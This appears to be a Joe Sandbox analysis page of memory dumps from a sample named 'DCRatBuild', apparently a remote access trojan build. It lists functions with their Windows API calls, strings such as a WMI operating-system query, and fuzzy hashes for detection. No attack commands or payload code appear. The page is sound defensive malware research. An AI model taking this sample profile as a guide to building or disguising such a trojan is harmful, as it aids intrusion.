Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ec097cfe7d78e59bbc77b4e4b0d939379383ced9804626613fd4f7d7cb76a52a
Instruction ID: acb6634a0858bea82b396eb7687c0b86135562f1dd272daf40ff26b6440524f6
Opcode Fuzzy Hash: ec097cfe7d78e59bbc77b4e4b0d939379383ced9804626613fd4f7d7cb76a52a
Instruction Fuzzy Hash: B7F0F9B8D002489FDB18CB28EC92BD573E1FB49715F554AD5D51593390CB70AA80CE61

Function 00B2F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00B2F3A5), ref: 00B2F9DA

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f054d7a69a330791ac41b23eb692341c3f855c2ad0482cd62e0a4b4a9bebc191
Instruction ID: 17b0aedeb1ff3acd91528189d620537fc2ca63e976dbe0f92399cf2eb38a73f7
Opcode Fuzzy Hash: f054d7a69a330791ac41b23eb692341c3f855c2ad0482cd62e0a4b4a9bebc191
Instruction Fuzzy Hash:

Function 00B3C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B3C030

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: da50ffef9c836754f4f9e59698ff5052faa5c3969e0c3c5c59a6856530b3a5b8
Instruction ID: e48056386a503c25549b52747fa792d1d6071172057b38f1e434ea032780bb35
Opcode Fuzzy Hash: da50ffef9c836754f4f9e59698ff5052faa5c3969e0c3c5c59a6856530b3a5b8
Instruction Fuzzy Hash: B6A00174A022019F97448F35AE597493AE9BA56A91709406AA509D6160EE2486A0AA01

Function 00B1E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B1E30E

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

Part of subcall function 00B21DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B51030,00000200,00B1D928,00000000,?,00000050,00B51030), ref: 00B21DC4

_strlen.LIBCMT ref: 00B1E32F
SetDlgItemTextW.USER32(?,00B4E274,?), ref: 00B1E38F
GetWindowRect.USER32(?,?), ref: 00B1E3C9
GetClientRect.USER32(?,?), ref: 00B1E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00B1E475
GetWindowRect.USER32(?,?), ref: 00B1E4A2
SetWindowTextW.USER32(?,?), ref: 00B1E4DB
GetSystemMetrics.USER32(00000008), ref: 00B1E4E3
GetWindow.USER32(?,00000005), ref: 00B1E4EE
GetWindowRect.USER32(00000000,?), ref: 00B1E51B
GetWindow.USER32(00000000,00000002), ref: 00B1E58D

Strings

$%s:, xrefs: 00B1E302
CAPTION, xrefs: 00B1E4BD
d, xrefs: 00B1E3F5

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: daf4797733732ced5c1478fef869cafb4ccd540dd819e992ba5dbe7f38ba3de0
Instruction ID: ec7fb9918228239412d34522846e54a3c920d161a78898289bf625e779da7b8d
Opcode Fuzzy Hash: daf4797733732ced5c1478fef869cafb4ccd540dd819e992ba5dbe7f38ba3de0
Instruction Fuzzy Hash: B7819171208301AFD710DF68CD89AAFBBE9FBC8B04F44091DFA98E7250D674E9458B52

Function 00B3CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00B3CB66

Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C71E
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C730
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C742
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C754
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C766
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C778
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C78A
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C79C
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C7AE
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C7C0
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C7D2
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C7E4
Part of subcall function 00B3C701: _free.LIBCMT ref: 00B3C7F6

_free.LIBCMT ref: 00B3CB5B

Part of subcall function 00B38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?), ref: 00B38DE2
Part of subcall function 00B38DCC: GetLastError.KERNEL32(?,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?,?), ref: 00B38DF4

_free.LIBCMT ref: 00B3CB7D
_free.LIBCMT ref: 00B3CB92
_free.LIBCMT ref: 00B3CB9D
_free.LIBCMT ref: 00B3CBBF
_free.LIBCMT ref: 00B3CBD2
_free.LIBCMT ref: 00B3CBE0
_free.LIBCMT ref: 00B3CBEB
_free.LIBCMT ref: 00B3CC23
_free.LIBCMT ref: 00B3CC2A
_free.LIBCMT ref: 00B3CC47
_free.LIBCMT ref: 00B3CC5F

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 0a123a10e1f1c7247cd6ce237d730a1e6e8390c1cdcb479a20cafd2059cbb071
Instruction ID: 69546b7840bdcdff192e416c9d3caa55bbeffcb8317a2c5de5da63dc966f58c2
Opcode Fuzzy Hash: 0a123a10e1f1c7247cd6ce237d730a1e6e8390c1cdcb479a20cafd2059cbb071
Instruction Fuzzy Hash: A6314A316003099FEB21AAB8D846B5ABBF9EF10710F3054A9F558E6192DF35EC40CB61

Function 00B29711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B29736
_wcslen.LIBCMT ref: 00B297D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00B297E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B29806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B2982D

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00B29760
</html>, xrefs: 00B297B7
<html>, xrefs: 00B29755, 00B2978E
utf-8"></head>, xrefs: 00B2976B

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 91478592d389a8a4eaa77c8a775dbe3c1fff32b0e317d6aa55a4f6c9439e8417
Instruction ID: 270070712f83541f6962f5a1cf52a1afff2823a9a21ef5f85fb8add6a7d5944a
Opcode Fuzzy Hash: 91478592d389a8a4eaa77c8a775dbe3c1fff32b0e317d6aa55a4f6c9439e8417
Instruction Fuzzy Hash: 82314A321083217BD725AF24AC46F6B77D8EF52720F24019DF509961D1EF709A0483A6

Function 00B2D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00B2D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00B2D6ED

Part of subcall function 00B21FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B1C116,00000000,.exe,?,?,00000800,?,?,?,00B28E3C), ref: 00B21FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00B2D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B2D720
GetObjectW.GDI32(00000000,00000018,?), ref: 00B2D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B2D75D
DeleteObject.GDI32(00000000), ref: 00B2D764
GetWindow.USER32(00000000,00000002), ref: 00B2D76D

Strings

STATIC, xrefs: 00B2D6F3

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: aed6ecaedab1acbeecfa13084e33427ccea6b95e29fd6b937467ae5c55634e7a
Instruction ID: 26a737be7ed601af3d606091c20e298d68343786bf267ceaaed1685af227204f
Opcode Fuzzy Hash: aed6ecaedab1acbeecfa13084e33427ccea6b95e29fd6b937467ae5c55634e7a
Instruction Fuzzy Hash: B31124322003307BE2216B70BC4AFAF76DCEB14B11F004550FA5DE20A1DB688F8562A1

Function 00B396F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B39705

Part of subcall function 00B38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?), ref: 00B38DE2
Part of subcall function 00B38DCC: GetLastError.KERNEL32(?,?,00B3C896,?,00000000,?,00000000,?,00B3C8BD,?,00000007,?,?,00B3CCBA,?,?), ref: 00B38DF4

_free.LIBCMT ref: 00B39711
_free.LIBCMT ref: 00B3971C
_free.LIBCMT ref: 00B39727
_free.LIBCMT ref: 00B39732
_free.LIBCMT ref: 00B3973D
_free.LIBCMT ref: 00B39748
_free.LIBCMT ref: 00B39753
_free.LIBCMT ref: 00B3975E
_free.LIBCMT ref: 00B3976C

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 511b7857cf99984a835cfdcb79143cb3f3254c67437765078e2ab7b510799e71
Instruction ID: bc9880cd545298b8b7448a6caf6003c5605a664c42cb1dd122193dd885653d11
Opcode Fuzzy Hash: 511b7857cf99984a835cfdcb79143cb3f3254c67437765078e2ab7b510799e71
Instruction Fuzzy Hash: AE11A476110209AFCB01EF54C842CD93BB5EF14750F6154A9FA088F262DE72DE509B85

Function 00B32E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B32F50
___TypeMatch.LIBVCRUNTIME ref: 00B3305E
_UnwindNestedFrames.LIBCMT ref: 00B331B0
CallUnexpected.LIBVCRUNTIME ref: 00B331CB
_abort.LIBCMT ref: 00B331D0

Strings

csm, xrefs: 00B32EDB
csm, xrefs: 00B32F87
csm, xrefs: 00B32E6E

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 929e14ecc1f9b6312a771b2a50cf0b74d8dfc317e5841eb156b3105af2b964aa
Instruction ID: 6443a8df6f6965a1089a8d9c6b7963b5a3e7e9aae2e5dace7348af202730d547
Opcode Fuzzy Hash: 929e14ecc1f9b6312a771b2a50cf0b74d8dfc317e5841eb156b3105af2b964aa
Instruction Fuzzy Hash: DAB15675800609EFCF29EFA8C8819AFBBF5FF14710F24419AE8156B212D735EA51CB91

Function 00B16FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B16FAA
_wcslen.LIBCMT ref: 00B17013
_wcslen.LIBCMT ref: 00B17084

Part of subcall function 00B17A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B17AAB
Part of subcall function 00B17A9C: GetLastError.KERNEL32 ref: 00B17AF1
Part of subcall function 00B17A9C: CloseHandle.KERNEL32(?), ref: 00B17B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00B16FCC
UNC\, xrefs: 00B17051
\??\, xrefs: 00B1702B
SeRestorePrivilege, xrefs: 00B16FC2

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 8f30d20f7a12f66f000432605d4731f95b8797490d0b8184db0d4136ed2e1e59
Instruction ID: d8cc315ad0ffbcf4de4166606eeb71dde6acaae4d816b40433aecbef4917e1c9
Opcode Fuzzy Hash: 8f30d20f7a12f66f000432605d4731f95b8797490d0b8184db0d4136ed2e1e59
Instruction Fuzzy Hash: D841E2B1D48344BAEB20A7749C86FEEB7FCDF05300F8444D5FA55A7182DA74AAC88761

Function 00B2B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11316: GetDlgItem.USER32(00000000,00003021), ref: 00B1135A
Part of subcall function 00B11316: SetWindowTextW.USER32(00000000,00B435F4), ref: 00B11370

EndDialog.USER32(?,00000001), ref: 00B2B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00B2B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B2B650
SetWindowTextW.USER32(?,?), ref: 00B2B661
GetDlgItem.USER32(?,00000065), ref: 00B2B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B2B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B2B694

Strings

LICENSEDLG, xrefs: 00B2B5D4

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 487c1f041c14ab5275587042a580634dfbc3a4bbba871d1511548bc22e9a42ff
Instruction ID: 278049a0faf4a54785bd23e6f6159125c60d4c94d3c95b5560698d76b424481b
Opcode Fuzzy Hash: 487c1f041c14ab5275587042a580634dfbc3a4bbba871d1511548bc22e9a42ff
Instruction Fuzzy Hash: 3A21F132204226BBD2125F66FC4AF7B7BEDEB4AF41F010454F60CA34E0CF969941A631

Function 00B2FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,6C4C7086,00000001,00000000,00000000,?,?,00B1AF6C,ROOT\CIMV2), ref: 00B2FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00B1AF6C,ROOT\CIMV2), ref: 00B2FE14
SysAllocString.OLEAUT32(00000000), ref: 00B2FE1F
_com_issue_error.COMSUPP ref: 00B2FE48
_com_issue_error.COMSUPP ref: 00B2FE52
GetLastError.KERNEL32(80070057,6C4C7086,00000001,00000000,00000000,?,?,00B1AF6C,ROOT\CIMV2), ref: 00B2FE57
_com_issue_error.COMSUPP ref: 00B2FE6A
GetLastError.KERNEL32(00000000,?,?,00B1AF6C,ROOT\CIMV2), ref: 00B2FE80
_com_issue_error.COMSUPP ref: 00B2FE93

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: e8b1a70e66386cdbdef201c6e03d796c8893823a80fd306413758cb7d4457057
Instruction ID: a7369a6d9a2d8947af7620b80a9aacdc89bcf8094af379ab72d8d06c0942168e
Opcode Fuzzy Hash: e8b1a70e66386cdbdef201c6e03d796c8893823a80fd306413758cb7d4457057
Instruction Fuzzy Hash: D2411071A00226ABCB11AF64EC45BBFBBF4FB48B10F1442B9F519E7251D7349A00C7A1

Function 00B1AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B1AF29

Strings

Windows 10, xrefs: 00B1B0C2
ROOT\CIMV2, xrefs: 00B1AF5C
Name, xrefs: 00B1B0B0
SELECT * FROM Win32_OperatingSystem, xrefs: 00B1AFCA
WQL, xrefs: 00B1AFDC

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 60fab62f67bde5bf47f931a1b8aec3f83ed6686641ce4532186a9a2856964280
Instruction ID: d3f66787fb5e9c9af79e1593879180064f7e4f22feeb419987526d9fd2d86c72
Opcode Fuzzy Hash: 60fab62f67bde5bf47f931a1b8aec3f83ed6686641ce4532186a9a2856964280
Instruction Fuzzy Hash: 51714875A00619AFDF14DFA4C895DAEB7F9FF49710B14019DE516E72A0CB30AE82CB60

Function 00B19382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B19387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B193AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B193C9

Part of subcall function 00B1C29A: _wcslen.LIBCMT ref: 00B1C2A2

Part of subcall function 00B21FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B1C116,00000000,.exe,?,?,00000800,?,?,?,00B28E3C), ref: 00B21FD1

_swprintf.LIBCMT ref: 00B19465

Part of subcall function 00B14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B140A5

MoveFileW.KERNEL32(?,?), ref: 00B194D4
MoveFileW.KERNEL32(?,?), ref: 00B19514

Strings

rtmp%d, xrefs: 00B1944E

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 1440508b7c085645c62103c00065ee7ae9f077a2589299143fdc2d3c8521aeef
Instruction ID: 31f94ae50fca10f24807f922b1c9c134af105fb6a3a4405214fffbd9e7cd602e
Opcode Fuzzy Hash: 1440508b7c085645c62103c00065ee7ae9f077a2589299143fdc2d3c8521aeef
